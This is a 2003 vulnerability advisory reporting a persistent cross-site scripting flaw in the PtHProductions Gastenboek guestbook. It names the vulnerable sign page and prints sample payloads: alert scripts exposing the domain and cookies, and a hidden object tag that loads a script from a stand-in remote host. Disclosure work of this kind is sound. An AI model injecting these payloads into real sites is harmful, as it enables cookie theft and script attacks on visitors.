------------------------------------------------------------------
- EXPL-A-2003-022 exploitlabs.com Advisory 022
------------------------------------------------------------------
-= PtHProductions Gastenboek =-

Donnie Werner
Aug, 29 2003

Vunerability(s):
----------------
1. Persistant XSS injection

Product:
--------
PtHProductions Gastenboek

Description of product:
-----------------------
Guestbook for / by www.pthproductions.be

VUNERABILITY / EXPLOIT
======================
message and name fields allows XSS injection

view - Bekijk gastenboek
post - Teken gastenboek

http://www.pthproductions.be/jongeren/Gastenboek/sign.asp

input XSS of your choice
<SCRIPT>alert(document.domain);</SCRIPT>
<SCRIPT>alert(document.cookie);</SCRIPT>
or
<object style="display:none" data="http://verybad-exploit-url/bad.js"></object>

Local:
------
no

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
helpdesk (at) pthproductions (dot) be [email concealed]
Concurrent with this advisory

Credits:
--------
Donnie Werner
morning_wood (at) e2-labs (dot) com [email concealed]
exploited? http://exploitlabs.com

[ reply ]